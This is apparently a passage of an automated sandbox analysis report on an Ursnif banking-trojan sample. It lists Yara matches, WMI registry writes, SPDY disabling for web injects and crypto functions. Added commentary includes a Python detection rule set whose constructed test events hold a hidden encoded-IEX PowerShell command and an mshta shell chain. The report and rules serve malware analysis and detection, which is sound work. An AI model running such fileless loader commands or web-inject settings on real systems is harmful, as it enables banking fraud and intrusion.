Source: Yara match File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY
Disables SPDY (sets EnableSPDY3_0 = 0 so the browser stays on plain HTTP/1.1, which the web-inject hooks can read and alter; likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E53276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 21_2_00E53276

System Summary:

Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
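Several of the behaviours this report lists are host-telemetry detections rather than network ones: the Sigma hits (MSHTA spawning a shell, encoded IEX, csc.exe compiling from a temp folder), the `nslookup myip.opendns.com` external-IP check, the `EnableSPDY3_0 = 0` write, and the StdRegProv registry writes above. The block below is an added example, not the Joe Sandbox or Sigma rule code, and not the sample's own command lines (the report does not reproduce them here): a small rule set over constructed, Sysmon-shaped events (Image, ParentImage, CommandLine for process creation; Image, TargetObject, Details for registry value sets) that expresses each of those behaviours as a check and runs it against constructed events that mirror them plus two benign controls. The `uitt4j30` folder name comes from the PDB path above; the SID, the `HKCU:\Software\Sample` key and the IEX one-liner are made up for the example. One assumption is flagged in the code: a StdRegProv write is carried out by the WMI provider host, so the registry event names WmiPrvSE.exe rather than the rundll32.exe that called `IWbemServices::ExecMethod`.

```python
import base64
import re

# Added example over constructed, Sysmon-shaped events. Command lines are
# constructed to mirror behaviours this report lists; they are not the sample's own.

def encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand is base64 over the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def decode_ps(cmdline: str) -> str:
    """Return the decoded script if the command line carries -e/-ec/-enc/-EncodedCommand."""
    m = re.search(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:          # binascii.Error is a ValueError subclass
        return ""


# myip.opendns.com is from the nslookup evidence; the rest from ip_check_url in the config.
IP_CHECK_HOSTS = ("myip.opendns.com", "curlmyip.net", "ident.me", "l2.io", "whatismyip.akamai.com")
SHELLS = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe", "\\wscript.exe", "\\cscript.exe")


def _img(ev: dict, key: str = "Image") -> str:
    return ev.get(key, "").lower()


RULES = {
    # Sigma "MSHTA Spawning Windows Shell": an HTA host has no reason to start a shell.
    "mshta_spawns_shell": lambda ev: ev["type"] == "process"
        and _img(ev, "ParentImage").endswith("\\mshta.exe") and _img(ev).endswith(SHELLS),
    # Sigma "Encoded IEX": decode the payload instead of matching base64 fragments.
    "encoded_iex": lambda ev: ev["type"] == "process"
        and _img(ev).endswith(("\\powershell.exe", "\\pwsh.exe"))
        and re.search(r"(?i)\b(?:iex|invoke-expression)\b", decode_ps(ev["CommandLine"])) is not None,
    # Sigma "Suspicious Csc.exe Source File Folder": Add-Type compiles from %TEMP%,
    # which is where the uitt4j30.pdb path in this report points.
    "csc_from_temp": lambda ev: ev["type"] == "process" and _img(ev).endswith("\\csc.exe")
        and "\\appdata\\local\\temp\\" in ev["CommandLine"].lower(),
    # "Uses nslookup.exe to query domains": external-IP discovery hosts.
    "external_ip_lookup": lambda ev: ev["type"] == "process" and _img(ev).endswith("\\nslookup.exe")
        and any(h in ev["CommandLine"].lower() for h in IP_CHECK_HOSTS),
    # "Disables SPDY": EnableSPDY3_0 set to 0 under Internet Settings.
    "spdy_disabled": lambda ev: ev["type"] == "registry"
        and ev["TargetObject"].lower().endswith("\\internet settings\\enablespdy3_0")
        and ev["Details"].endswith("(0x00000000)"),
    # "Writes registry values via WMI": StdRegProv runs inside the WMI provider host, so the
    # registry event names WmiPrvSE.exe, not the rundll32.exe that asked (assumption).
    "registry_write_via_wmi": lambda ev: ev["type"] == "registry"
        and _img(ev).endswith("\\wmiprvse.exe") and "\\software\\" in ev["TargetObject"].lower(),
}


def evaluate(event: dict) -> list:
    return [name for name, rule in RULES.items() if rule(event)]


def scan(events) -> dict:
    """Map event index to the rule names it matched; silent events are omitted."""
    hits = {}
    for i, ev in enumerate(events):
        matched = evaluate(ev)
        if matched:
            hits[i] = matched
    return hits


HIVE = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"   # constructed SID
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed
    {"type": "process", "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c start /b powershell"},
    {"type": "process", "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -enc " + encode_ps(
         "IEX ([Text.Encoding]::ASCII.GetString((Get-ItemProperty HKCU:\\Software\\Sample).Blob))")},
    {"type": "process", "ParentImage": PS,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline"'},
    {"type": "process", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\nslookup.exe",
     "CommandLine": "nslookup myip.opendns.com resolver1.opendns.com"},
    {"type": "registry", "Image": r"C:\Windows\explorer.exe",
     "TargetObject": HIVE + r"\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0",
     "Details": "DWORD (0x00000000)"},
    {"type": "registry", "Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "TargetObject": HIVE + r"\Software\Microsoft\Sample\Config", "Details": "Binary Data"},
    # Benign controls: an encoded command without IEX, and an ordinary child of explorer.
    {"type": "process", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -enc " + encode_ps("Get-Date")},
    {"type": "process", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for idx, matched in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], matched)
```

Decoding the `-enc` argument before searching it is a deliberate departure from the published Encoded IEX rule, which matches the base64 fragments of `IEX` at its three possible alignments; decoding costs a little more but also catches `Invoke-Expression` spelled out and is not fooled by whitespace padding. The WmiPrvSE.exe attribution is the check to verify on your own telemetry before relying on it: the StdRegProv writes above are only visible as such because the sandbox hooks `IWbemServices::ExecMethod`, and an EDR that lacks a WMI-activity source will see them as registry writes by the provider host.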
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E5725F 21_2_00E5725F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E57E30 21_2_00E57E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E51754 21_2_00E51754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05593570 21_2_05593570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05575C88 21_2_05575C88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055710E6 21_2_055710E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055790A1 21_2_055790A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05587B5D 21_2_05587B5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05584B1F 21_2_05584B1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055843B9 21_2_055843B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0557FBA9 21_2_0557FBA9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0557423D 21_2_0557423D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558DAED 21_2_0558DAED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055952A0 21_2_055952A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EE95C 31_2_000002174F3EE95C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3FB948 31_2_000002174F3FB948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3FB230 31_2_000002174F3FB230
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F06B4 31_2_000002174F3F06B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F6EA0 31_2_000002174F3F6EA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E6684 31_2_000002174F3E6684
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D76F4 31_2_000002174F3D76F4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F5ED8 31_2_000002174F3F5ED8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EC6C4 31_2_000002174F3EC6C4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E2EC0 31_2_000002174F3E2EC0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F2EF8 31_2_000002174F3F2EF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E559C 31_2_000002174F3E559C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E1DF4 31_2_000002174F3E1DF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F4DE0 31_2_000002174F3F4DE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E5DBC 31_2_000002174F3E5DBC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D3610 31_2_000002174F3D3610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D74A4 31_2_000002174F3D74A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E4484 31_2_000002174F3E4484
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E9500 31_2_000002174F3E9500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D4B60 31_2_000002174F3D4B60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F4354 31_2_000002174F3F4354
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D1348 31_2_000002174F3D1348
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E8340 31_2_000002174F3E8340
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3FA3A4 31_2_000002174F3FA3A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F4BA0 31_2_000002174F3F4BA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3DABDC 31_2_000002174F3DABDC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F9408 31_2_000002174F3F9408
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F3400 31_2_000002174F3F3400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EBA74 31_2_000002174F3EBA74
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D9AD8 31_2_000002174F3D9AD8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3ED328 31_2_000002174F3ED328
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F730C 31_2_000002174F3F730C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F5164 31_2_000002174F3F5164
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E1164 31_2_000002174F3E1164
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E4150 31_2_000002174F3E4150
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D0000 31_2_000002174F3D0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D2138 31_2_000002174F3D2138
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EA9F8 31_2_000002174F3EA9F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E70C8 31_2_000002174F3E70C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F88B8 31_2_000002174F3F88B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E0124 31_2_000002174F3E0124
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D90FC 31_2_000002174F3D90FC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F404796 31_2_000002174F404796
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EF7B4 31_2_000002174F3EF7B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EA790 31_2_000002174F3EA790
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E7820 31_2_000002174F3E7820
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D1000 31_2_000002174F3D1000
Source: C:\Windows\System32\control.exe Code function: 38_2_000DB948 38_2_000DB948
Source: C:\Windows\System32\control.exe Code function: 38_2_000CE95C 38_2_000CE95C
Source: C:\Windows\System32\control.exe Code function: 38_2_000DB230 38_2_000DB230
Source: C:\Windows\System32\control.exe Code function: 38_2_000D3400 38_2_000D3400
Source: C:\Windows\System32\control.exe Code function: 38_2_000B1000 38_2_000B1000
Source: C:\Windows\System32\control.exe Code function: 38_2_000C7820 38_2_000C7820
Source: C:\Windows\System32\control.exe Code function: 38_2_000D88B8 38_2_000D88B8
Source: C:\Windows\System32\control.exe Code function: 38_2_000C70C8 38_2_000C70C8
Source: C:\Windows\System32\control.exe Code function: 38_2_000B90FC 38_2_000B90FC
Source: C:\Windows\System32\control.exe Code function: 38_2_000C0124 38_2_000C0124
Source: C:\Windows\System32\control.exe Code function: 38_2_000B2138 38_2_000B2138
Source: C:\Windows\System32\control.exe Code function: 38_2_000C6944 38_2_000C6944
Source: C:\Windows\System32\control.exe Code function: 38_2_000C4150 38_2_000C4150
Source: C:\Windows\System32\control.exe Code function: 38_2_000C1164 38_2_000C1164
Source: C:\Windows\System32\control.exe Code function: 38_2_000D5164 38_2_000D5164
Source: C:\Windows\System32\control.exe Code function: 38_2_000CA9F8 38_2_000CA9F8
Source: C:\Windows\System32\control.exe Code function: 38_2_000CBA74 38_2_000CBA74
Source: C:\Windows\System32\control.exe Code function: 38_2_000B9AD8 38_2_000B9AD8
Source: C:\Windows\System32\control.exe Code function: 38_2_000D730C 38_2_000D730C
Source: C:\Windows\System32\control.exe Code function: 38_2_000CD328 38_2_000CD328
Source: C:\Windows\System32\control.exe Code function: 38_2_000B1348 38_2_000B1348
Source: C:\Windows\System32\control.exe Code function: 38_2_000C8340 38_2_000C8340
Source: C:\Windows\System32\control.exe Code function: 38_2_000D4354 38_2_000D4354
Source: C:\Windows\System32\control.exe Code function: 38_2_000B4B60 38_2_000B4B60
Source: C:\Windows\System32\control.exe Code function: 38_2_000DA3A4 38_2_000DA3A4
Source: C:\Windows\System32\control.exe Code function: 38_2_000D4BA0 38_2_000D4BA0
Source: C:\Windows\System32\control.exe Code function: 38_2_000BABDC 38_2_000BABDC
Source: C:\Windows\System32\control.exe Code function: 38_2_000D9408 38_2_000D9408
Source: C:\Windows\System32\control.exe Code function: 38_2_000C4484 38_2_000C4484
Source: C:\Windows\System32\control.exe Code function: 38_2_000B74A4 38_2_000B74A4
Source: C:\Windows\System32\control.exe Code function: 38_2_000C9500 38_2_000C9500
Source: C:\Windows\System32\control.exe Code function: 38_2_000C559C 38_2_000C559C
Source: C:\Windows\System32\control.exe Code function: 38_2_000C5DBC 38_2_000C5DBC
Source: C:\Windows\System32\control.exe Code function: 38_2_000D4DE0 38_2_000D4DE0
Source: C:\Windows\System32\control.exe Code function: 38_2_000C1DF4 38_2_000C1DF4
Source: C:\Windows\System32\control.exe Code function: 38_2_000B3610 38_2_000B3610
Source: C:\Windows\System32\control.exe Code function: 38_2_000C6684 38_2_000C6684
Source: C:\Windows\System32\control.exe Code function: 38_2_000D6EA0 38_2_000D6EA0
Source: C:\Windows\System32\control.exe Code function: 38_2_000D06B4 38_2_000D06B4
Source: C:\Windows\System32\control.exe Code function: 38_2_000CC6C4 38_2_000CC6C4
Source: C:\Windows\System32\control.exe Code function: 38_2_000C2EC0 38_2_000C2EC0
Source: C:\Windows\System32\control.exe Code function: 38_2_000D5ED8 38_2_000D5ED8
Source: C:\Windows\System32\control.exe Code function: 38_2_000D2EF8 38_2_000D2EF8
Source: C:\Windows\System32\control.exe Code function: 38_2_000B76F4 38_2_000B76F4
Source: C:\Windows\System32\control.exe Code function: 38_2_000CA790 38_2_000CA790
Source: C:\Windows\System32\control.exe Code function: 38_2_000CF7B4 38_2_000CF7B4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ADB948 40_2_00000195D8ADB948
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ADB230 40_2_00000195D8ADB230
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ADA3A4 40_2_00000195D8ADA3A4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD4BA0 40_2_00000195D8AD4BA0
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACF7B4 40_2_00000195D8ACF7B4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACA790 40_2_00000195D8ACA790
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ABABDC 40_2_00000195D8ABABDC
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACD328 40_2_00000195D8ACD328
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD2EF8 40_2_00000195D8AD2EF8
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD730C 40_2_00000195D8AD730C
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB4B60 40_2_00000195D8AB4B60
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC8340 40_2_00000195D8AC8340
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD4354 40_2_00000195D8AD4354
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB1348 40_2_00000195D8AB1348
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB74A4 40_2_00000195D8AB74A4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC4484 40_2_00000195D8AC4484
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD88B8 40_2_00000195D8AD88B8
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC70C8 40_2_00000195D8AC70C8
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC7820 40_2_00000195D8AC7820
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB1000 40_2_00000195D8AB1000
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD3400 40_2_00000195D8AD3400
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD9408 40_2_00000195D8AD9408
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC559C 40_2_00000195D8AC559C
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD4DE0 40_2_00000195D8AD4DE0
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC1DF4 40_2_00000195D8AC1DF4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC5DBC 40_2_00000195D8AC5DBC
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC0124 40_2_00000195D8AC0124
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC9500 40_2_00000195D8AC9500
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB90FC 40_2_00000195D8AB90FC
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD5164 40_2_00000195D8AD5164
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC1164 40_2_00000195D8AC1164
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACE95C 40_2_00000195D8ACE95C
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC6944 40_2_00000195D8AC6944
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB2138 40_2_00000195D8AB2138
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC4150 40_2_00000195D8AC4150
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD6EA0 40_2_00000195D8AD6EA0
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD06B4 40_2_00000195D8AD06B4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC6684 40_2_00000195D8AC6684
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB9AD8 40_2_00000195D8AB9AD8
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD5ED8 40_2_00000195D8AD5ED8
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB76F4 40_2_00000195D8AB76F4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACC6C4 40_2_00000195D8ACC6C4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC2EC0 40_2_00000195D8AC2EC0
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACA9F8 40_2_00000195D8ACA9F8
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB3610 40_2_00000195D8AB3610
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACBA74 40_2_00000195D8ACBA74
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AEF5CC 40_2_00000195D8AEF5CC
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0557E6B4 CreateProcessAsUserA, 21_2_0557E6B4
Java / VBScript file with very long strings (likely obfuscated code)
Source: 345678.vbs Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
